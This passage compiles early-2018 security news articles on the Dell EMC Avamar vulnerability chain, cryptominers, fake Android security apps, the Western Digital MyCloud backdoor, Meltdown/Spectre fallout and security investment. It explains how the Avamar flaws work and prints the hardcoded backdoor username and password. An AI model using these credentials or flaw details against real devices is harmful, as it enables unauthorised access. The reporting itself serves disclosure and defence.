The most severe issue tracked as CVE-2017-15548 could be exploited by a remote attacker to bypass authentication and gain root access to the system.

The flaw is related to the authentication process that is implemented via a POST request including the username, password and a parameter named wsUrl.

“User authentication is performed via a POST that includes username, password and wsURL parameters. The wsURL parameter can be an arbitrary URL that the Avamar server will send an authentication SOAP request to, that includes the user provided username and password,” reads the analysis published by Digital Defense. “If the Avamar server receives a successful SOAP response, it will return a valid session ID. The attacker doesn’t require any specific knowledge about the targeted Avamar server to generate the successful SOAP response, a generic, validly formed SOAP response will work for multiple Avamar servers.”

The second flaw, tracked as CVE-2017-15549, could be exploited by an authenticated attacker with low privileges to upload malicious files to the server.

“Authenticated users can upload arbitrary files to arbitrary locations with root privileges. This can be combined with the other two vulnerabilities to fully compromise the virtual appliance.” continues the analysis.

“The saveFileContents method of the UserInputService class takes a single string parameter and splits it on the ‘\r’ character. The first half of the parameter is a path, including the filename, and the second half of the string is the data that should be written to that path. The web server is running with root privileges, so arbitrary files can be written to arbitrary locations.”

The third vulnerability tracked as CVE-2017-15550 is a path traversal issue that allows an authenticated attacker with low privileges to access arbitrary files on the server.

“Authenticated users can download arbitrary files with root privileges. This can be combined with the other two vulnerabilities to fully compromise the virtual appliance.” states the analysis.

“The getFileContents method of the UserInputService class doesn’t perform any validation of the user supplied filename parameter before retrieving the requested file from the Avamar server. Additionally, the web server runs as root, so any file can be retrieved using this vulnerability.”

By chaining the three vulnerabilities a remote attacker could take complete control of a vulnerable system.

Affected products are:

Avamar Server 7.1.x, 7.2.x, 7.3.x, 7.4. x, 7.5.0
NetWorker Virtual Edition 0.x, 9.1.x, 9.2.x
Integrated Data Protection Appliance 2.0
EMC has released security fixes that address all the flaws.


Experts spotted Monero cryptominer sending currency to North Korean University
9.1.2018 securityaffairs Hacking

Security researchers at AlienVault labs recently analyzed an application compiled on Christmas Eve 2017 that is an installer for a Monero cryptocurrency miner.
The mined Monero coins are sent to Kim Il Sung University in Pyongyang, North Korea, but experts noted that the developers might not be of North Korean origins.

The KSU is an unusually open University, it is attended by a number of foreign students and lecturers.

The researchers speculate the application could either be an experimental software or could be a prank to trick security researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Monero miner North Korea

Once executed, it copies a file named intelservice.exe to the system, this is the Monero cryptocurrency mining malware.

“The filename intelservice.exe is often associated with crypto-currency mining malware. Based on the arguments it’s executed with, it’s likely a piece of software called xmrig.” reads the analysis published by AlienVault.

“It’s not unusual to see xmrig in malware campaigns. It was recently used in some wide campaignsexploiting unpatched IIS servers to mine Monero.”

The experts determined that it is a piece of software called xmrig by observing the arguments the file is executed with.

Analyzing the file the researchers discovered both the address of the Monero wallet and the password used that is “KJU”, a possible reference to Kim Jong-un.

The mined currency is sent to the server barjuok.ryongnamsan.edu.kp server located at Kim Il Sung University.

The address barjuok.ryongnamsan.edu.kp address doesn’t currently resolve, either because the app was designed to run on the university’s network, or because it was no longer in use.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining.” continues the analysis.

“On the one hand the sample contains obvious messages printed for debugging that an attacker would avoid. But it also contains fake filenames that appear to be an attempt to avoid detection of the installed mining software.”

Security experts pointed out that North Korea-linked group Lazarus was already involved in attacks involving cryptocurrencies.

In December, security experts from Secureworks revealed the Lazarus APT group launched a spearphishing campaign against a London cryptocurrency company.

The attacks focused on Monero conducted by North Korean threat actors were associated with Bluenorroff and Andariel hackers, who are considered as being part of the Lazarus group. Researchers from AlienVault highlighted that they haven’t discovered evidence to link the newly found Installer to any attacks attributed to Lazarus.

“We have not identified anything linking our Installer to these attacks. The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code.” concluded the research. “Given the amateur usage of Visual Basic programming in the Installer we analysed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project.”

Experts also made another hypothesis, someone inside the University developed the project to test the use of cryptocurrency in a country hit hard by sanctions.


Trend Micro spotted 36 malicious apps advertised as security tools spotted in Google Play
8.1.2018 securityaffairs Android

Researchers from Trend Micro have discovered 36 malicious apps on Google Play that are posing as security tools of major firms.
Once again crooks bypassed security checks implemented by Google, researchers from Trend Micro have discovered 36 malicious apps on Google Play that are posing as security tools.

Crooks advertised the apps as security tools as applications developed by major security firms, including Security Defender, Security Keeper, Smart Security, Advanced Boost.

The applications were developed to steal user information and flood them with ads.

“These apps posed as useful security tools under the names Security Defender, Security Keeper, Smart Security, Advanced Boost, and more. They also advertised a variety of capabilities: scanning, cleaning junk, saving battery, cooling the CPU, locking apps, as well as message security, WiFi security, and so on.” reads the blog post published Trend Micro.

“The apps were actually able to perform these simple tasks, but they also secretly harvested user data, tracked user location, and aggressively pushed advertisements.”

The apps collect information such as the user’s Android ID, Mac address, IMSI, OS data, brand and model of the device, device specifics, language, location information, and data on installed apps like Google Play and Facebook to sends to a remote server.

The malicious apps are also capable of uploading installed app information, attachments, user operational information, and data on activated events as well.

When the apps are launched for the first time, they will not appear on the device launcher’s list of applications, the shortcuts will also not appear on the device screen in this way victims will only be able to see notifications sent by the apps. The malicious apps typically push alarmist security warnings and pop-up windows to the victims.

Experts noticed that the apps implement a specific function called “hide” that will not allow the applications to run on specified devices including the Google Nexus 6P, Xiaomi MI 4LTE, ZTE N958St and LGE LG-H525n. Experts believe that the “hide” function was developed to avoid security checks implemented by Google Play.

The apps bombard the users with false security notifications and other messages like advertisements, examples of notifications are “10.0 GB files are being wasted” or “Fraud SMS Broadcast Vulnerability.”

security%20tools%20malicious%20apps

If a user clicks the displayed button on the prompt, the fake security tools will show a simple animation notifying the resolution of the problem.

“The user is bombarded with ads with almost every action. It is clear that one of the main focuses of the app is ad display and click fraud.” continues the analysis.

“Users are actually asked to sign and agree to a EULA (end-user license agreement) which describes the information that will be gathered and used by the app,” researchers said in the report. “But we can still say that the app abuses privacy because the collection and transmission of personal data is unrelated to the functionality of the app.”

The game security tools were spotted in December 2017 and promptly removed.


BlackBerry Mobile Website hacked, crooks installed a Coinhive’s code to mine Monero
8.1.2018 securityaffairs Hacking

According to Coinhive, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento e-commerce software.
The spike in the value of some cryptocurrencies like Bitcoin is attracting the interest of cyber criminals. The numbers of incidents and cyber attacks involving miners and mining scripts continue to increase and the last in order of time seems to be the BlackBerry Mobile Site.

On January 6, a Reddit user that handle the moniker “Rundvleeskroket” claims that the official website of BlackBerry Mobile was caught using Coinhive’s cryprocurrency code to mine Monero. Rundvleeskroket wrote that his friend pointed out that Blackberry Mobile domain (blackberrymobile.com) was using the Coinhive code,

“A friend of mine just pointed this out to me.
Have a look at the source code on their pages. This is an official site where BB links to themselves from their product pages at blackberry.com.

Image.” he wrote.

Originally pointed out by /u/cryptocripples on /r/security

Update: it seems like only their global site is affected. So anyone getting redirected to CA, EU, US, etc won’t have the coinhive miner running while the site is open.”

The Reddit user also shared the following screenshot:

coinhive%20script%20blackberry%20mobile

The Coinhive code was removed from the BlackBerry mobile site, unfortunately, such kind of incidents is becoming frequent. In many cases, website owners are using the CoinHive code to generate Monero exploiting computational resources of unaware visitors.

In December experts from Sucuri discovered that nearly 5,500 WordPress websites were infected with a malicious script that logs keystrokes and in loads a cryptocurrency miner in the visitors’ browsers.

In November, experts reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

According to a Coinhive’s comment on the Reddit post, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento ecommerce software.

According to Coinhive, the same Coinhive’s account was used in the hack of many other websites, for this reason, it was suspended.

“Coinhive here. We’re sorry to hear that our service has been misused. This specific user seems to have exploited a security issue in the Magento web shop software (and possibly others) and hacked a number of different sites. We have terminated the account in question for violating our terms of service now.” commented Coinhive.


Monero Miner Sends Cryptocurrency to North Korean University
8.1.2018 securityweek Hacking
An application compiled just weeks ago was found to be an installer for a Monero miner designed to send the mined currency to a North Korean university, AlienVault reports.

The application’s developers, however, might not be of North Korean origins themselves, the security researchers say. They also suggest that the tool could either be only an experimental application or could attempt to trick researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Once the discovered installer is run, it copies a file named intelservice.exe to the system, which is often associated with cryptocurrency mining malware. The arguments the file is executed with reveal it is a piece of software called xmrig, a program already associated with wide campaigns exploiting unpatched IIS servers to mine Monero.

Analysis of the file revealed both the address of the Monero wallet and the password (KJU, possible reference to Kim Jong-un) it uses, as well as the fact that it sends the mined currency to the server barjuok.ryongnamsan.edu.kp server. The use of this domain reveals that the server is located at Kim Il Sung University, AlienVault says.

AlienVault's security researchers also discovered that the specified address doesn’t resolve, either because the app was designed to run on the university’s network, because the address used to resolve in the past, or because it is only meant to trick security researchers.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining,” AlienVault says.

The sample was also found to contain obvious messages printed for debugging as well as fake filenames meant to avoid detection. According to the researchers, if the software author is at the Kim Il Sung University, they might not be North Korean.

“KSU is an unusually open University, and has a number of foreign students and lecturers,” the researchers explain.

North Korean attacks focused on Monero mining have been spotted before, such as those associated with Bluenorroff and Andariel hackers, who are generally considered as being part of the Lazarus group. However, AlienVault hasn’t discovered evidence to link the newly found installer to the previous attacks.

“The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code. Given the amateur usage of Visual Basic programming in the Installer we analyzed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project,” the researchers note.

On the other hand, with the country hit hard by sanctions, crypto-currencies could easily prove highly valuable resources, and a North Korean university’s interest in the area wouldn’t be surprising.

In fact, the Pyongyang University of Science and Technology recently invited foreign experts to lecture on crypto-currencies, and the recently discovered installer might be a product of their endeavors, AlienVault suggests.


Serious Flaws Affect Dell EMC, VMware Data Protection Products
8.1.2018 securityweek
Vulnerebility
Data protection products from both Dell EMC and VMware are impacted by three potentially serious vulnerabilities discovered by researchers at Digital Defense.

EMC told customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products have a common component, the Avamar Installation Manager (AVI). This component is affected by vulnerabilities that can be combined to take complete control of a system.

The most serious of the flaws, CVE-2017-15548, allows a remote attacker to bypass authentication and gain root access to the system. The vulnerability is related to the fact that authentication is performed via a POST request that includes the username, password and a parameter named wsUrl.

“The wsURL parameter can be an arbitrary URL that the Avamar server will send an authentication SOAP request to, that includes the user provided username and password,” Digital Defense explained. “If the Avamar server receives a successful SOAP response, it will return a valid session ID. The attacker doesn't require any specific knowledge about the targeted Avamar server to generate the successful SOAP response, a generic, validly formed SOAP response will work for multiple Avamar servers.”

The second vulnerability, CVE-2017-15549, allows an authenticated attacker with low privileges to upload malicious files to the server.

“The saveFileContents method of the UserInputService class takes a single string parameter and splits it on the ‘\r’ character,” researchers said. “The first half of the parameter is a path, including the filename, and the second half of the string is the data that should be written to that path. The web server is running with root privileges, so arbitrary files can be written to arbitrary locations.”

The third security hole, CVE-2017-15550, has been described as a path traversal issue that allows an authenticated attacker with low privileges to access arbitrary files on the server.

“The getFileContents method of the UserInputService class doesn't perform any validation of the user supplied filename parameter before retrieving the requested file from the Avamar server. Additionally, the web server runs as root, so any file can be retrieved using this vulnerability,” researchers said.

Combining the flaws allows a remote attacker to take complete control of a vulnerable system.

EMC Avamar Server 7.1.x, 7.2.x, 7.3.x, 7.4.x and 7.5.0, EMC NetWorker Virtual Edition (NVE) 9.0.x, 9.1.x and 9.2.x, and EMC Integrated Data Protection Appliance 2.0 are impacted. EMC has released patches for each of the affected products.

Digital Defense told SecurityWeek that there are more than 100 Avamar server instances accessible from the Internet – according to the Shodan search engine – which experts say is unexpected considering that the affected products are backup and deduplication appliances.

While a blog post from Digital Defense and some media reports describe the flaws as “zero-days,” the vendor has released patches prior to disclosure and there is no evidence of exploitation in the wild.

The vulnerabilities also affect VMware’s vSphere Data Protection (VDP) product. VMware informed customers of the issues on January 2, but it did not reference Digital Defense or EMC. Digital Defense told SecurityWeek that VMware’s VDP is a derivative of the EMC product and EMC informed VMware of the security bugs.


Lawsuits Filed Against Intel Over CPU Vulnerabilities
8.1.2018 securityweek
Vulnerebility
At least three class action lawsuits have been filed against Intel in the past days over the recently disclosed vulnerabilities that could allow malicious hackers to obtain potentially sensitive information from computers.

The Meltdown and Spectre attack methods uncovered by several independent research teams work not only against Intel processors, but also against CPUs from AMD and ARM. Intel has been hit the hardest – even its stock went down after initial reports claimed only Intel processors were affected – but the company says media reports describing the design flaws are overblown.

The lawsuits, all seeking class action status, have been filed in the Northern District of California, the Southern District of Indiana, and the District of Oregon, and they accuse Intel of violating state consumer protection laws. All complaints demand a jury trial.

In California, Branstetter, Stranch & Jennings of Nashville and Doyle APC of San Diego filed a consumer fraud case, accusing Intel of misleading consumers about the performance and reliability of its processors by selling a product with “fatal” security flaws.

The complaint filed in Indiana alleges that “Intel committed unfair and deceptive acts by representing that the Intel CPUs had performance, characteristics, or benefits which Intel knew or should reasonably have known they did not have.”

The chip giant has also been accused of breaching warranties by selling defective CPUs that it’s not willing to repair or replace free of charge. The Indiana lawsuit also claims the company was negligent in the manufacture and design of its processors.

In Oregon, plaintiffs say they are entitled to restitution based on Intel’s “intentional and knowing failures to disclose material defects.” The complaint claims plaintiffs would have acquired a CPU from an Intel competitor had they known about the flaws and the fact that they will end up with a slower product.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data, including passwords, photos, documents, emails, and data from instant messaging apps. The bugs that make these attacks possible are said to date back 20 years.

Intel and other major tech companies have started releasing patches and workarounds for the vulnerabilities, and many believe it’s enough for the time being. Some have suggested that Intel may need to recall impacted CPUs, but the vendor says that will not happen considering that the issue can be mitigated at software level.

Significant performance penalties have been observed in some cases, but Intel says most consumers will not experience any problems, and it’s confident that any penalties will be mitigated over time.

AMD has confirmed that some of the flaws also affect its own processors, but claims the risk of attacks is “near zero.” ARM, whose technology is used by Apple and Qualcomm, also confirmed that nearly a dozen of its Cortex CPUs are impacted.


Hardcoded Backdoor Found on Western Digital Storage Devices
8.1.2018 securityweek
Vulnerebility
Firmware updates released by Western Digital for its MyCloud family of devices address a series of security issues, including a hardcoded backdoor admin account.

The vulnerabilities were found in WDMyCloud firmware prior to version 2.30.165 and are said to affect devices such as MyCloud, MyCloudMirror, My Cloud Gen 2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2, My Cloud EX4, My Cloud EX2100, My Cloud EX4100, My Cloud DL2100, and My Cloud DL4100.

Discovered by GulfTech security researcher James Bercegay, the security flaws could be exploited to achieve remote root code execution on the affected WD My Cloud personal cloud storage units (the device is currently the best-selling NAS (network attached storage) device on Amazon).

One of the most important security issues the researcher found was an unrestricted file upload vulnerability created by the “misuse and misunderstanding of the PHP gethostbyaddr() function,” the researcher says.

The vulnerable code in said file allows an attacker to define a remote auth server, which could be an attacker-controlled server. The result should fail if an invalid host is defined, but a series of bugs result in checks being skipped, eventually allowing an attacker to abuse the issue “to upload any file to the server that they want.”

While analyzing CGI binaries on the webserver, the security researcher discovered code where login functionality would specifically look for an admin user named “mydlinkBRionyg” and would accept the password “abc12345cba”.

The researcher then discovered that the backdoor could be turned into a root shell that would allow an attacker to execute any commands as root and gain control of the affected device. Damaging a vulnerable device would be extremely easy and would not require authentication.

“The triviality of exploiting this issues makes it very dangerous, and even wormable. Not only that, but users locked to a LAN are not safe either. An attacker could literally take over your WDMyCloud by just having you visit a website where an embedded iframe or img tag make a request to the vulnerable device using one of the many predictable default hostnames for the WDMyCloud such as "wdmycloud" and "wdmycloudmirror" etc.,” Bercegay explains.

In addition to the two critical vulnerabilities, the security researcher discovered a series of other dangerous issues as well in the WDMyCloud firmware. These bugs, however, are not deemed Critical, especially since some of them require authentication to be exploited.

The WDMyCloud web interface was found to lack an effective Cross site request forgery protection and exploitation of the issue is trivial, the researcher says. WDMyCloud is also plagued with a series of command injection issues. An attacker can abuse the language preferences functionality to cause denial of service to the web interface and can dump a list of all users, including detailed user information.

The researcher also discovered that the exact same mydlinkBRionyg backdoor account was found in the D-Link DNS-320L ShareCenter NAS device a while back, supposedly because both devices shared common firmware code. However, the issue was addressed in D-Link DNS-320L with firmware version 1.0.6, released in July 2014.

“It is interesting to think about how before D-Link updated their software two of the most popular NAS device families in the world, sold by two of the most popular tech companies in the world were both vulnerable at the same time, to the same backdoor for a while. The time frame in which both devices were vulnerable at the same time in the wild was roughly from early 2014 to later in 2014 based on comparing firmware release note dates,” Bercegay notes.

The researcher reported all these vulnerabilities to the vendor in June 2017. Firmware release 2.30.174 should address all of these issues.


Microsoft Patches for CPU Flaws Break Windows, Apps
8.1.2018 securityweek
Vulnerebility
Users have complained that the updates released by Microsoft last week for the Spectre and Meltdown vulnerabilities cause Windows to break down on some computers with AMD processors.

Several individuals whose computers rely on AMD processors, particularly older Athlon models, say they are unable to start Windows 10 after installing KB4056892, an update released by Microsoft in response to the disclosure of serious flaws affecting Intel, AMD and ARM processors.

The security holes have been dubbed Spectre and Meltdown and they allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information. Both local and remote exploitation are possible.

Users have reported that after installing Microsoft’s update the operating system freezes during boot when the Windows logo is displayed. Some users claimed to have had problems reverting to a previous state, and those who did manage to do it warned that the automatic update feature needs to quickly be disabled to prevent the update from being reinstalled.

While a majority of the affected users appear to have older AMD Athlon processors, some devices with AMD Turion CPUs also appear to have been hit.

Microsoft has not shared any information regarding this issue. A Microsoft spokesperson told SecurityWeek that the company is aware of the reports and is investigating.

Users have reported other problems as well after installing KB4056892. Owners of Asus devices say they receive an error message related to an Asus utility after updating.

The Spectre/Meltdown updates appear to break the PulseSecure VPN on both Windows 10 and Windows 8.1 – the patch for Windows 8.1 is included in KB4056898. The VPN vendor has released patches to address the issue.

Some Windows users report that they simply cannot install the patches for the CPU vulnerabilities, and some say their web browsers have started crashing after applying the update.

Shortly after releasing the Meltdown/Spectre updates, Microsoft warned that it had identified some compatibility issues with some antivirus products. The company informed users that if they had not been offered the security updates, they may be running an incompatible antivirus application.


Cybersecurity's Venture Capital and Private Equity Money-go-Round
8.1.2018 securityweek Cyber
Access to Money at the Right Time is Essential for Cybersecurity Firms Given the Volatility of the Market

Security firms bought by and consumed within larger firms can easily lose their way. It happened with McAfee, bought by Intel in 2010 for $7.68 billion, and extracted with a 51% purchase by private equity (PE) firm TPG in April 2017. The extraction valued McAfee at only $4.2 billion.

McAfee will be hoping that it can emulate SonicWall -- which also lost its way after being bought by Dell (from Thoma Bravo) in 2012. In the summer of 2016, Francisco Partners and Elliott Management extracted SonicWall (along with Quest Software) for a price reported by Reuters to around $2 billion. Thoma Bravo did not disclose the price Dell paid for SonicWall, but the Wall Street Journal suggested it was $1.2 billion.

Dell acquired Quest Software for $2.4 billion in 2012 -- making the combined cost of the two firms somewhere in the region of $3.6 billion. In short, the two firms together fell in value from $3.6 billion to just $2 billion in the five years they spent as part of Dell.

Since then, SonicWall has been turned around under PE guidance and the stewardship of CEO Bill Connor. A little over a year after purchasing the two firms, Francisco Partners announced that it had completed a $2 billion debt refinancing, due to the strong operating performance of the firms. The refinancing was significantly oversubscribed, it reduces the operating overheads of the firms, and positions them nicely for further growth.

Private Equity in Cybersecurity

Access to money at the right time (and a few other things like the right management team) is essential for cybersecurity firms given the volatility of the market in both emerging start-ups and changing technology. This means that finding the right backers and understanding the investment market could be fundamental to the prospects of almost any cybersecurity firm. Excluding the unknown potential of the new small-scale crowdfunding options, there are three primary sources of serious money: angel investment, venture capital (VC) and private equity (PE).

'Angels' tend to be individuals -- or possibly collections of individuals -- who invest their own money in promising ideas. They are often important in getting a new company started; but do not normally have sufficient funds to take a growing company to the next level.

That next level of funding generally comes from venture capital (VC). VC funds "like Paladin, Amadeus and others step in to provide capital to entrepreneurs just after their angel or ‘proof of concept' phase of funding," explains Nazo Moosa. Moosa this year formed a new European VC firm called VT Partners, with the express purpose of injecting U.S.-style funding and growth into the under-performing European cybersecurity company market.

The key point for VC is that it funds new companies with new ideas. At this stage they are promising rather than proven; some will succeed, many will fail. Because of the additional risk to the investors, VC money is invested at high interest rates. This is the biggest problem area for the cybersecurity industry -- because of the high interest rates, returns need to be made relatively fast, and/or additional investment found. A company's value is often based on the number of its users, so sales can in many cases be more important than further product development.

Of course, not all VC firms are there just for a quick return. Dan Schiappa, Sophos SVP and GM, explains, "The top echelon investors are not in it for the quick turnaround, but instead they are long-term investors that will add value to a management team and towards building a long term viable company." But he adds, "VCs who look to build a company for acquisition from the get-go are the ones to avoid, as they may drive behaviors that are not beneficial to customers or product quality."

The problem is that cybersecurity attracts both types of VC money, simply because it is hot. "Everybody is under attack all of the time," comments Connor "from other countries, cybercriminals, and hacktivists. So it's a hot area and hot areas tend to attract a lot of opportunity and a lot of money. From that there are a lot of start-ups with new 'silver bullets' that attract VC."

Schiappa believes there is a common cycle for new security companies. Initial idea and development is followed by VC investment. The money enables strong marketing, which effectively makes or breaks the business depending on the inherent strength of the initial product.

"At the end of the day," Schiappa explains, "much of the problem is that tech entrepreneurs follow the logic of getting product out as quickly as possible and gaining feedback. While in some circumstances that is a good and viable strategy, in others, it produces low quality products, that may be innovative, but are not suitable to build a scalable business. Startups get hyped, their innovation gets adopted; but then -- when they hit a scale that goes beyond the business or the product -- they enter the trough of sorrow, where investment is needed to build the product properly. During this period of time, you usually see a pickup in marketing in order to keep the momentum going. It can takes years for a company to exit the trough with the quality product and business operations to scale to a legitimate business."

The problem for the cybersecurity industry is that new ideas do not often have 'years' to spare; they are constantly being supplanted by new and different ideas and technology.

"The hype cycle is where a startup can make it or break it," he continues. "If they are building quality products during the hype cycle, they will withstand the scale and not enter the trough, or enter it very briefly. Those who ship a product that is barely more than a prototype are destined for disaster."

Some VC investors collude in this cycle by insufficiently understanding cybersecurity. "There is a lot of money at play in the security space," warns Connor, "because it's such an interesting area, and an area that's not going to go away -- and there's also a lot of money that doesn't really understand security. It's not necessarily dumb money, but it's at risk in this space."

A good VC is not just a money lender -- it's a mentor who, adds Schiappa, "will guide the company properly and even provide technical advisers who can ensure that the product is built with production quality."

Company founders and private investors usually have one common long-term aim -- to maximize a return on their time and capital. There are three primary routes: sale to a larger company; going public and raising money on a stock exchange; and attracting the next level of private investment. The next level is 'private equity'. It is 'big money' that generally becomes available to companies that have been through the early growth phases of venture capital and have demonstrated the potential for future growth.

PE differs from VC in two primary ways: firstly there is generally more money available than there is in VC; and secondly, PE usually seeks to take a greater stake in the company -- if not actual ownership -- rather than simply investing in it. "PE firms tend to take on more ownership and liability of a company," comments Nathan Wenzler, "and so, they tend to have a stronger motivation to invest in the long term viability of it."

In this way, private equity firms play a different role in the evolution of a company. A PE firm looks for demonstrable potential. It is not interested in firms that have maxed their potential, but in firms that are perhaps slightly under-performing.

"They tend," explains Schiappa, "to acquire a company that has been an established vendor, has meaningful billings and revenues, but might not be operating at its full potential." SonicWall and McAfee both fit this bill. By improving performance, the PE firm will be able to gain its own return through one of two exit strategies: sale to a big security firm (or a larger PE firm); or going public. Unlike the majority of VC firms, PE tends to take a longer term view of the growth of its investment.

One method of improving performance -- beyond simply injecting capital -- is to strengthen the management team. A PE firm, says Schiappa, will "typically bring in professional leaders to guide the company to the public markets or to a larger exit. The PE firm is definitely investing with an exit in mind and their goal is to build value in the asset towards meeting that need. In most cases it is always beneficial to the company and their strategy and operations."

When Francisco Partners acquired SonicWall from Dell, it was because SonicWall was losing its way despite having proven product, and therefor potential. "What Francisco Partners saw," explains Connor, "was a multiple $100m dollar company where the revenue was going down. It was losing money, but some of us -- and that included myself -- knew that the company had been growing before and made money before; both when it was private and public. So we knew it just needed to get restructured, or rebuilt and refocused -- which is what I've done over the last years."

The first thing the PE company did was to bring in Bill Connor as the new CEO. Connor already had successful experience in working with a PE firm, having taken Entrust through its four-year period with Thoma Bravo to its sale to the Datacard Group in 2013; for what he says was six and a half times the PE firm's original investment.

This is the cybersecurity money-go-round. VC firms look for the next silver bullet that could give the investors a high return over a short period. It tends to be new technology or an innovative idea; but there is no company track record. The risks are higher, so the cost of the money is more expensive. This can lead to increased pressure on the company to grow as fast as possible. If that growth can be sustained, the company will succeed; if it cannot, it will fail.

If the company succeeds, it can then become a target for private equity investment. That company now has a track record, but PE is looking for the potential for even greater growth through a combination of additional funds and perhaps improved leadership. There are, and there always will be, casualties -- both in silver bullet companies that prove to lack luster, and buyers of those products. During the hype phase of VC, users can be persuaded to buy a product that under-performs and ultimately fails -- and that could prove costly to the user beyond the price of the product. The PE phase is more stable. PE firms are confident that the product is good and the market is strong.

Overall, the system works. By far the majority of big cybersecurity firms are U.S.-based, with only a handful of European firms reaching a similar scale. It is no coincidence that the U.S. has five times the venture funding as that of Europe. But to use the system profitably, new companies need to choose the right VC investment in their early years. Cybersecurity firms should examine the track record of VC firms just as closely as PE firms examine the track record of the cybersecurity firms.

Incidentally, Dell, which first bought SonicWall and then sold it to PE firms Francisco Partners and Elliott Management, has its own investments history. It started in 1984 with Michael Dell building and selling personal computers while he was a student at the University of Texas at Austin, using $1,000 capital provided by his family. As he proved his worth, his family increased their 'investment' to a loan of $500,000, similar to early stage 'angel' investments.

As his firm grew, Dell did not proceed to the venture capital stage. Instead, he hired a retired merchant banker and venture capitalist, Lee Walker, as president and CEO. Walker helped secure the firm's first serious credit -- a bank's line of credit for $10 million. Dell also skipped the private equity stage, and raised capital in a private placement in 1987 and went public via an initial public offering in 1988. Michel Dell retained a significant position in the company, but no longer had personal control.

During the 1990s, the company continued to prosper, but started to suffer from the increasing commoditization of personal computers after 2000, and the later effect of mobile devices on the PC market. Dell's market dominance declined -- but in 2013 Dell announced that Michael Dell and Silver Lake Partners, together with a $2 billion loan from Microsoft, would take the company private in a $24.4 billion leveraged buyout deal. In essence, Michael Dell used private equity to escape from public ownership rather than the more usual route of using it to prepare for public ownership.

It was the PE-backed Dell that announced the purchase of EMC for $67 billion in October 2015, completing the deal in September 2016. The combined companies became Dell Technologies, the world's largest privately controlled integrated technology company, which also includes security industry pioneeer RSA.


Microsoft KB4056892 Meltdown/Spectre patch bricks AMD Athlon-powered machines
8.1.2017 securityaffairs
Vulnerebility

Many users claim the Security Update for Windows KB4056892, the Microsoft Meltdown/Spectre patch, bricks AMD Athlon-powered machines.
Meltdown and Spectre vulnerabilities will continue to create a lot of problems to users and chip vendors.

As you know, tech giants like Apple, Cisco and Microsoft admitted the problem for their products and started rolling out security patched.

While many experts argued that the fixes will have a significant impact on the performance of any devices, Intel confirmed that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess any impact on system performance from security updates did not reveal negative effects.

Unfortunately, the problems seem not ended, the fix released by Microsoft for the Meltdown and Spectre attacks (Security Update for Windows KB4056892) is bricking some AMD PCs, in particular, Athlon-powered machines.

Let’s remind that AMD CPUs are not susceptible to the Meltdown attack, but are vulnerable only to Spectre attacks.

amd

In this thread on answers.microsoft.com, many users claim that the Security Update for Windows KB4056892 bricks some AMD-powered PCs and leaves them displaying with the Windows startup logo.

“I have older AMD Athlon 64 X2 6000+, Asus MB, after installation of KB4056892 the system doesn’t boot, it only shows the Windows logo without animation and nothing more. After several failed boots it do roll-back then it shows error 0x800f0845. Unfortunately, it seems it’s not easy to disable the automatic updates without gpedit tweaks, so it tries installing and rolling-back the update over and over. ” reported an angry user.

Athlon-powered systems just after the installation of the patch stopped working, and the worst news is that the fix doesn’t create a recovery point, and rollback is some cases not accessible.

Some users reported that even re-installing Windows 10 doesn’t solve the problem.

Affected users will need to disable Windows Update, but only Microsoft can solve the embarrassing situation for its AMD users.

At the time, the thread did not include any response from Microsoft.


Following recent mass demonstration, Iran Infy group may attempt to target protesters and their foreign contacts
8.1.2017 securityaffairs BigBrothers

Following the recent mass demonstration, the Iran-linked Infy group may attempt to target protesters and their contacts abroad.
The crackdown of Iranian authorities on protesters and dissident could have a wide range and involve anyone in contact with them.

According to cybersecurity firms and researchers, a nation-state actor called Infy is intensifying its attacks against anyone is in contact with protesters.

The state-sponsored hackers target victims with spear-phishing messages that are constantly refined and improved.

According to the experts Palo Alto Networks, the Infy group is active at least since 2007, its malware was involved in attacks in the country and abroad.

The name Infy malware is based on a string used by the VXers in filenames and command and control (C&C) folder names and strings.

Infy%20group

The Infy malware was first submitted to VirusTotal on August 2007, meanwhile, the C&C domain used by the oldest sample spotted by the experts has been associated with a malicious campaign dated back December 2004.

The malware evolved over the years, the authors improved it by implementing new features such as support for the Microsoft Edge web browser that was introduced in the version 30.

Unlike other Iranian nation-state actors who target foreign organizations, the Infy group appears focused on opponents and dissidents.

Researchers Colin Anderson and Claudio Guarnieri, authors of the research titled “Iran and the Soft War for Internet Dominance,” confirmed that the Infy attackers were responsible for a large number of attempted malware attacks against Iranian civil society since late 2014.

In response to the recent mass demonstrations, the Iran Government also tried to isolate the protests by blocking internet on mobile networks, the authorities blocked Instagram and messaging services like Telegram.

Security experts believe that protesters will be targeted by the Infy actor, its malware will be used against anyone has any kind of relationship with them.


Spear phishing attacks already targeting Pyeongchang Olympic Games
8.1.2017 securityaffairs
Phishing

Hackers are already targeting the Pyeongchang Olympic Games with spear phishing attacks aimed at stealing sensitive or financial information.
Security researchers from McAfee reported hackers are already targeting Pyeongchang Olympic Games, many organizations associated with the event had received spear phishing messages.

Most of the targeted organizations is involved with the Olympics either in providing infrastructure or in a supporting role.

“Attached in an email was a malicious Microsoft Word document with the original file name 농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc (“Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”).” reported McAfee.

“The primary target of the email was icehockey@pyeongchang2018.com, with several organizations in South Korea on the BCC line. The majority of these organizations had some association with the Olympics, either in providing infrastructure or in a supporting role.”

